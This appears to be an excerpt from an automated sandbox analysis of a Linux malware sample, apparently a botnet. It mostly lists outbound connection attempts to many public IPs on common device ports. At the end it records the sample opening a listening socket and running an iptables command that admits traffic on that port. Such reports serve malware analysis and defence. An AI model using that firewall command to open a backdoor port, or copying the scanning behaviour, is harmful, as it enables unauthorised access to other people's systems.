Source: global traffic	TCP traffic: 192.168.2.20:44338 -> 145.249.112.110:37215
Source: global traffic	TCP traffic: 192.168.2.20:34220 -> 182.112.56.21:37215
Source: global traffic	TCP traffic: 192.168.2.20:40646 -> 45.228.110.91:8080
Source: global traffic	TCP traffic: 192.168.2.20:40778 -> 167.154.0.215:81
Source: global traffic	TCP traffic: 192.168.2.20:50098 -> 109.162.104.119:8080
Source: global traffic	TCP traffic: 192.168.2.20:59850 -> 6.117.24.0:8080
Source: global traffic	TCP traffic: 192.168.2.20:59852 -> 148.98.127.31:7574
Source: global traffic	TCP traffic: 192.168.2.20:50362 -> 213.131.147.141:8443
Source: global traffic	TCP traffic: 192.168.2.20:60932 -> 22.225.214.100:5555
Source: global traffic	TCP traffic: 192.168.2.20:58072 -> 19.139.235.199:49152
Source: global traffic	TCP traffic: 192.168.2.20:36030 -> 174.201.122.204:8443
Source: global traffic	TCP traffic: 192.168.2.20:42960 -> 156.249.53.230:52869
Source: global traffic	TCP traffic: 192.168.2.20:46104 -> 11.48.52.253:52869
Source: global traffic	TCP traffic: 192.168.2.20:46822 -> 86.114.25.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:51544 -> 216.111.216.82:37215
Source: global traffic	TCP traffic: 192.168.2.20:38618 -> 17.164.29.91:52869
Source: global traffic	TCP traffic: 192.168.2.20:42904 -> 45.234.221.196:5555
Source: global traffic	TCP traffic: 192.168.2.20:33222 -> 66.232.73.239:5555
Source: global traffic	TCP traffic: 192.168.2.20:45572 -> 59.19.242.88:8080
Source: global traffic	TCP traffic: 192.168.2.20:37966 -> 91.180.74.171:49152
Source: global traffic	TCP traffic: 192.168.2.20:34904 -> 131.16.172.129:5555
Source: global traffic	TCP traffic: 192.168.2.20:48872 -> 72.242.88.155:81
Source: global traffic	TCP traffic: 192.168.2.20:54330 -> 156.194.253.153:37215
Source: global traffic	TCP traffic: 192.168.2.20:57496 -> 33.91.25.116:81
Source: global traffic	TCP traffic: 192.168.2.20:57568 -> 169.134.101.55:49152
Source: global traffic	TCP traffic: 192.168.2.20:47480 -> 110.10.168.48:5555
Source: global traffic	TCP traffic: 192.168.2.20:43214 -> 171.5.81.156:8080
Source: global traffic	TCP traffic: 192.168.2.20:58042 -> 68.163.230.108:52869
Source: global traffic	TCP traffic: 192.168.2.20:60804 -> 210.219.207.3:8080
Source: global traffic	TCP traffic: 192.168.2.20:52896 -> 213.58.83.64:81
Source: global traffic	TCP traffic: 192.168.2.20:35732 -> 125.234.106.133:8080
Source: global traffic	TCP traffic: 192.168.2.20:38762 -> 182.149.146.177:8080
Source: global traffic	TCP traffic: 192.168.2.20:49036 -> 138.7.161.211:52869
Source: global traffic	TCP traffic: 192.168.2.20:47654 -> 109.61.100.248:8080
Source: global traffic	TCP traffic: 192.168.2.20:58694 -> 94.166.64.10:5555
Source: global traffic	TCP traffic: 192.168.2.20:48986 -> 163.70.83.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:43100 -> 183.250.239.211:8080
Source: global traffic	TCP traffic: 192.168.2.20:37622 -> 33.54.67.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:55968 -> 84.62.5.182:8443
Source: global traffic	TCP traffic: 192.168.2.20:46258 -> 116.147.238.153:37215
Source: global traffic	TCP traffic: 192.168.2.20:34866 -> 6.232.250.250:8080
Source: global traffic	TCP traffic: 192.168.2.20:33864 -> 1.5.148.231:8080
Source: global traffic	TCP traffic: 192.168.2.20:39298 -> 55.77.192.67:8443
Source: global traffic	TCP traffic: 192.168.2.20:34300 -> 220.89.101.239:8443
Source: global traffic	TCP traffic: 192.168.2.20:52116 -> 187.133.162.42:5555
Source: global traffic	TCP traffic: 192.168.2.20:34318 -> 105.202.244.96:7574
Source: global traffic	TCP traffic: 192.168.2.20:43462 -> 103.16.83.23:7574
Source: global traffic	TCP traffic: 192.168.2.20:33290 -> 153.153.124.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:57636 -> 137.8.108.189:5555
Source: global traffic	TCP traffic: 192.168.2.20:59940 -> 77.186.145.187:5555
Source: global traffic	TCP traffic: 192.168.2.20:42288 -> 16.119.106.89:8080
Source: global traffic	TCP traffic: 192.168.2.20:47410 -> 77.137.8.165:8080
Source: global traffic	TCP traffic: 192.168.2.20:36216 -> 42.241.34.105:8080
Source: global traffic	TCP traffic: 192.168.2.20:40810 -> 183.238.2.60:81
Source: global traffic	TCP traffic: 192.168.2.20:56094 -> 165.40.111.59:52869
Source: global traffic	TCP traffic: 192.168.2.20:54388 -> 211.72.191.195:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 203.204.92.244:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 76.179.94.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 47.178.77.204:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 121.121.241.203:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 85.26.236.253:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 160.221.21.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 53.184.19.200:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 198.9.196.56:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 85.221.238.78:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 143.1.224.175:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 171.153.71.56:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 174.51.201.83:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 13.163.7.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 203.223.110.147:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 136.38.16.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 47.254.200.229:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 190.227.232.240:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 79.37.180.218:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 46.200.62.22:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 73.9.241.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 177.176.214.85:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 156.167.89.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 211.166.254.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 66.218.10.63:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 139.151.132.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 217.50.165.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 75.82.144.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.140.27.106:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.63.97.36:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 205.162.45.253:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.252.178.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 48.56.36.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 71.38.218.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:33868 -> 146.244.33.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:57874 -> 131.7.179.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:54196 -> 41.64.118.236:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 188.176.86.229:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.167.165.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 122.243.242.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 111.0.125.36:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 185.50.62.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 59.172.13.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 188.200.140.122:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 115.42.52.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 183.16.231.232:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 206.17.179.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 112.254.112.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 174.47.48.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 66.178.106.107:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 88.38.36.48:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 207.253.148.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 63.43.183.132:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 76.81.222.62:2323
Source: global traffic	TCP traffic: 192.168.2.20:35476 -> 220.165.204.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 158.101.147.68:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.47.126.190:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 163.68.243.17:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 87.254.248.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 104.46.233.185:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 38.8.33.243:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 75.210.106.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 202.213.251.249:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 190.178.70.246:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.158.105.90:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 193.73.223.232:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 119.91.55.78:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 186.19.26.160:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 95.196.154.222:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 197.185.25.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 202.65.105.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 32.153.134.237:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 193.238.117.21:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 89.27.104.84:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.175.116.15:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 53.252.135.112:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 148.42.51.67:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 220.187.21.100:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 75.196.238.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 88.220.144.120:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.139.136.230:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 86.106.153.130:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 187.196.99.229:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 121.130.64.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 101.183.25.205:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 53.164.22.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 110.62.230.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 133.137.4.253:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 183.168.194.168:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 32.243.64.41:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 126.3.149.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 163.166.58.36:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 24.240.185.140:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 61.199.114.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 20.211.166.14:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 27.207.136.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 120.34.226.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 61.61.71.43:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 82.89.10.174:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 141.34.29.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 19.224.224.230:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 13.185.66.112:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 168.75.205.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 173.115.134.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.125.161.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:35492 -> 5.187.144.78:7574
Source: global traffic	TCP traffic: 192.168.2.20:37100 -> 190.206.177.195:7574
Source: global traffic	TCP traffic: 192.168.2.20:58838 -> 60.182.4.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:36900 -> 34.226.216.9:52869
Source: global traffic	TCP traffic: 192.168.2.20:54874 -> 45.66.168.229:81
Source: global traffic	TCP traffic: 192.168.2.20:49722 -> 148.119.94.202:8080
Source: global traffic	TCP traffic: 192.168.2.20:60760 -> 124.100.92.68:8080
Source: global traffic	TCP traffic: 192.168.2.20:47312 -> 168.144.37.63:7574
Source: global traffic	TCP traffic: 192.168.2.20:55472 -> 31.65.174.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:59848 -> 179.86.197.224:8443
Source: global traffic	TCP traffic: 192.168.2.20:55356 -> 79.74.222.218:8080
Source: global traffic	TCP traffic: 192.168.2.20:35232 -> 12.118.224.5:8080
Source: global traffic	TCP traffic: 192.168.2.20:49328 -> 194.139.111.238:8080
Source: global traffic	TCP traffic: 192.168.2.20:41840 -> 26.34.213.157:49152
Source: global traffic	TCP traffic: 192.168.2.20:36462 -> 161.230.34.156:37215
Source: global traffic	TCP traffic: 192.168.2.20:37816 -> 37.98.108.113:81
Source: global traffic	TCP traffic: 192.168.2.20:39546 -> 158.143.122.210:52869
Source: global traffic	TCP traffic: 192.168.2.20:40436 -> 193.36.5.127:49152
Source: global traffic	TCP traffic: 192.168.2.20:33418 -> 31.20.82.249:8080
Source: global traffic	TCP traffic: 192.168.2.20:35740 -> 161.127.238.198:81
Source: global traffic	TCP traffic: 192.168.2.20:50382 -> 136.113.197.35:8443
Source: global traffic	TCP traffic: 192.168.2.20:48226 -> 83.41.228.148:8443
Source: global traffic	TCP traffic: 192.168.2.20:41260 -> 37.126.224.143:52869
Source: global traffic	TCP traffic: 192.168.2.20:53138 -> 101.227.190.33:5555
Source: global traffic	TCP traffic: 192.168.2.20:48044 -> 111.240.142.16:7574
Source: global traffic	TCP traffic: 192.168.2.20:55242 -> 158.38.176.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:58760 -> 140.134.218.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:49084 -> 184.61.35.161:5555
Source: global traffic	TCP traffic: 192.168.2.20:51112 -> 116.25.201.150:8080
Source: global traffic	TCP traffic: 192.168.2.20:59970 -> 196.198.124.215:8443
Source: global traffic	TCP traffic: 192.168.2.20:50028 -> 52.16.235.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:42628 -> 58.30.72.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:35864 -> 173.110.61.196:7574
Source: global traffic	TCP traffic: 192.168.2.20:59006 -> 135.4.185.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:38830 -> 143.147.160.1:81
Source: global traffic	TCP traffic: 192.168.2.20:44456 -> 94.135.178.87:81
Source: global traffic	TCP traffic: 192.168.2.20:58872 -> 72.99.199.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:58790 -> 151.74.246.170:81
Source: global traffic	TCP traffic: 192.168.2.20:55876 -> 78.175.116.20:52869
Source: global traffic	TCP traffic: 192.168.2.20:36794 -> 202.81.140.0:81
Source: global traffic	TCP traffic: 192.168.2.20:60620 -> 53.134.248.119:52869
Source: global traffic	TCP traffic: 192.168.2.20:55554 -> 26.147.179.51:52869
Source: global traffic	TCP traffic: 192.168.2.20:54754 -> 176.102.246.130:5555
Source: global traffic	TCP traffic: 192.168.2.20:39122 -> 56.151.171.111:8080
Source: global traffic	TCP traffic: 192.168.2.20:48678 -> 113.254.69.147:7574
Source: global traffic	TCP traffic: 192.168.2.20:48330 -> 206.27.21.74:5555
Source: global traffic	TCP traffic: 192.168.2.20:48038 -> 39.252.230.232:8443
Source: global traffic	TCP traffic: 192.168.2.20:55860 -> 190.71.92.106:49152
Source: global traffic	TCP traffic: 192.168.2.20:43970 -> 149.145.117.99:5555
Source: global traffic	TCP traffic: 192.168.2.20:46000 -> 44.188.108.249:8443
Source: global traffic	TCP traffic: 192.168.2.20:60688 -> 8.132.20.149:8443
Source: global traffic	TCP traffic: 192.168.2.20:35494 -> 74.119.4.125:8443
Source: global traffic	TCP traffic: 192.168.2.20:42656 -> 22.158.74.158:5555
Source: global traffic	TCP traffic: 192.168.2.20:35660 -> 216.40.146.138:8080
Source: global traffic	TCP traffic: 192.168.2.20:58458 -> 126.239.116.72:8080
Source: global traffic	TCP traffic: 192.168.2.20:33462 -> 208.33.128.23:8080
Source: global traffic	TCP traffic: 192.168.2.20:54130 -> 222.204.252.34:5555
Source: global traffic	TCP traffic: 192.168.2.20:51074 -> 44.141.251.112:49152
Source: global traffic	TCP traffic: 192.168.2.20:59086 -> 155.192.173.3:49152
Source: global traffic	TCP traffic: 192.168.2.20:50826 -> 92.82.252.190:5555
Source: global traffic	TCP traffic: 192.168.2.20:46708 -> 34.144.238.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:46958 -> 98.137.65.157:52869
Source: global traffic	TCP traffic: 192.168.2.20:60756 -> 72.89.219.141:8443
Source: global traffic	TCP traffic: 192.168.2.20:36870 -> 216.127.243.47:8080
Source: global traffic	TCP traffic: 192.168.2.20:41072 -> 180.119.171.72:5555
Source: global traffic	TCP traffic: 192.168.2.20:51280 -> 173.235.230.238:8443
Source: global traffic	TCP traffic: 192.168.2.20:47058 -> 207.230.142.20:8080
Source: global traffic	TCP traffic: 192.168.2.20:37854 -> 140.64.139.164:8080
Source: global traffic	TCP traffic: 192.168.2.20:55376 -> 51.170.75.171:37215
Source: global traffic	TCP traffic: 192.168.2.20:45412 -> 200.164.44.27:37215
Source: global traffic	TCP traffic: 192.168.2.20:48688 -> 51.238.146.201:81
Source: global traffic	TCP traffic: 192.168.2.20:53756 -> 180.176.10.237:81
Source: global traffic	TCP traffic: 192.168.2.20:38876 -> 73.43.76.24:5555
Source: global traffic	TCP traffic: 192.168.2.20:34170 -> 85.61.49.109:8080
Source: global traffic	TCP traffic: 192.168.2.20:58048 -> 19.79.231.29:8080
Source: global traffic	TCP traffic: 192.168.2.20:40964 -> 70.113.63.226:8443
Source: global traffic	TCP traffic: 192.168.2.20:52226 -> 211.44.209.80:8443
Source: global traffic	TCP traffic: 192.168.2.20:49224 -> 157.5.200.51:7574
Source: global traffic	TCP traffic: 192.168.2.20:56926 -> 56.179.20.91:49152
Source: global traffic	TCP traffic: 192.168.2.20:37358 -> 75.244.195.175:8080
Source: global traffic	TCP traffic: 192.168.2.20:42222 -> 71.113.61.118:49152
Source: global traffic	TCP traffic: 192.168.2.20:36356 -> 96.105.199.49:7574
Source: global traffic	TCP traffic: 192.168.2.20:48666 -> 219.171.175.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:48680 -> 152.77.109.165:81
Source: global traffic	TCP traffic: 192.168.2.20:49400 -> 120.3.130.253:8443
Source: global traffic	TCP traffic: 192.168.2.20:38714 -> 222.35.115.231:52869
Source: global traffic	TCP traffic: 192.168.2.20:48808 -> 29.191.42.58:8080
Source: global traffic	TCP traffic: 192.168.2.20:60036 -> 93.26.114.163:8080
Source: global traffic	TCP traffic: 192.168.2.20:48434 -> 43.76.242.175:8080
Source: global traffic	TCP traffic: 192.168.2.20:36502 -> 23.165.91.76:5555
Source: global traffic	TCP traffic: 192.168.2.20:58162 -> 42.4.201.2:52869
Source: global traffic	TCP traffic: 192.168.2.20:53462 -> 167.243.21.26:7574
Source: global traffic	TCP traffic: 192.168.2.20:40934 -> 166.71.33.66:37215
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 126.173.187.250:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.251.42.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 54.26.235.219:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 115.36.198.11:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 163.136.89.118:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 106.43.189.61:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 39.236.0.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 209.120.183.182:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 184.238.11.237:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 9.151.116.206:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 124.181.145.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 182.106.163.140:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 90.179.152.71:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 77.253.34.142:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 106.160.177.38:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 83.190.188.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 12.199.143.201:2323
Source: global traffic	TCP traffic: 192.168.2.20:32920 -> 97.191.181.246:52869
Source: global traffic	TCP traffic: 192.168.2.20:35860 -> 67.159.181.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 206.165.72.172:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 125.35.75.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 187.155.226.130:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 178.123.15.193:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 217.205.168.132:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 101.177.86.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 59.66.159.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 70.40.129.75:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 178.88.210.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.48.178.169:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 195.49.212.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 27.204.236.161:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 206.39.31.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 198.8.107.227:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 114.219.83.119:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 164.147.110.159:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 209.143.229.253:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 104.164.201.197:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 38.155.199.107:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 46.120.23.248:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 182.223.61.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 8.198.203.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.120.220.137:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 193.120.5.123:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 87.78.13.108:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 140.231.227.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 170.134.88.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 185.120.151.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 93.102.109.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 190.215.114.237:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 207.17.7.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 116.72.59.199:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 76.123.98.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:53474 -> 190.126.252.140:52869
Source: global traffic	TCP traffic: 192.168.2.20:49638 -> 118.144.15.19:37215
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 179.67.151.112:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 72.214.7.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 71.199.207.110:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 191.185.159.193:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 57.124.145.13:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 145.200.155.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 34.110.165.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 67.241.120.56:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 2.254.169.42:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 145.25.76.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 209.162.247.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 44.185.101.89:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 189.147.158.128:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 109.181.142.240:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 17.233.5.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.185.136.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 103.115.64.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 65.74.248.65:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 119.84.157.150:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 166.102.52.220:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 156.151.56.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 9.208.247.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 149.52.37.158:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 141.199.106.142:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 176.146.163.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 91.191.81.144:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.102.196.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 102.201.117.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 97.107.48.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 189.51.27.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 188.130.4.252:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 160.94.210.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 46.204.100.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 87.112.133.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 2.95.37.31:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 183.104.203.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 123.222.206.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 167.76.204.52:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 57.27.248.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.66.112.200:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.89.141.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.192.171.157:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 23.178.112.227:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 122.83.37.215:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 93.198.168.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 83.169.254.83:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 197.49.14.136:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 151.227.168.124:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 68.23.39.237:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 122.145.165.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 110.142.83.223:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 196.158.255.105:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 112.102.181.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 78.178.152.141:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 123.180.27.243:2323

Sample listens on a socket

Source: /tmp/bin.sh (PID: 6815)

Socket: 0.0.0.0::47453

Jump to behavior

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 6827)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
